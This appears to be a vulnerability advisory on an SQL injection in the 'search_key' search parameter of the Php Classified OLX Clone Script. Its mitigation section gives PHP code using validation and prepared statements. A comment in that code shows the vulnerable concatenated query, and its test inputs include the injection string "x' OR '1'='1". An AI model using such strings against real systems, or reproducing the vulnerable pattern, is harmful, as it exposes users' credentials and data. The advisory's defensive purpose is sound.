Vendor: Php Classified OLX Clone Script
By: Ihsan Sencan
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Php Classified OLX Clone Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017
Php Classified OLX Clone Script – SQL Injection
An SQL injection vulnerability exists in the Php Classified OLX Clone Script. It is triggered when an attacker supplies specially crafted SQL in the vulnerable 'search_key' parameter of the 'search' page. This allows the attacker to extract sensitive information from the database, such as usernames, passwords, full names, and emails.
Mitigation:
Input validation should be applied to user-supplied values, and parameterized queries should be used so that those values are never interpreted as SQL.
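The two mitigations applied to a 'search_key' search, as an added example that is not code from the script or its vendor. The `ads` table, the function names and the in-memory SQLite database are assumptions made so the example runs stand-alone; the sample rows and inputs are constructed.

```php
<?php
// Constructed schema and rows; the real script's tables are not shown on the page.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ads (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO ads (title) VALUES
            ('Used bicycle'), ('Office chair'), ('100% cotton shirt')");

// Input validation: accept only a non-empty string of bounded length.
// Arrays (search_key[]=...) and oversized values are rejected outright.
function validate_search_key($raw): ?string
{
    if (!is_string($raw)) {
        return null;
    }
    $key = trim($raw);
    return ($key === '' || strlen($key) > 64) ? null : $key;
}

// Vulnerable pattern, shown only for contrast and never executed here:
//   $sql = "SELECT ... WHERE title LIKE '%" . $_GET['search_key'] . "%'";
// The hardened form below sends the value separately from the SQL text.
function search_ads(PDO $pdo, $raw): array
{
    $key = validate_search_key($raw);
    if ($key === null) {
        return [];
    }
    // Escape LIKE wildcards so '%' and '_' in user input match literally.
    $pattern = '%' . strtr($key, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $pdo->prepare(
        "SELECT id, title FROM ads WHERE title LIKE :pattern ESCAPE '!'"
    );
    $stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal term, a value containing a quote (bound as
// data, so it cannot change the query), a literal '%', and a non-string.
foreach (['chair', "x' OR '1'='1", '100%', ['a']] as $input) {
    $rows = search_ads($pdo, $input);
    printf("%s => %d row(s)\n", json_encode($input), count($rows));
}
```

With a MySQL backend, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the driver uses server-side prepared statements.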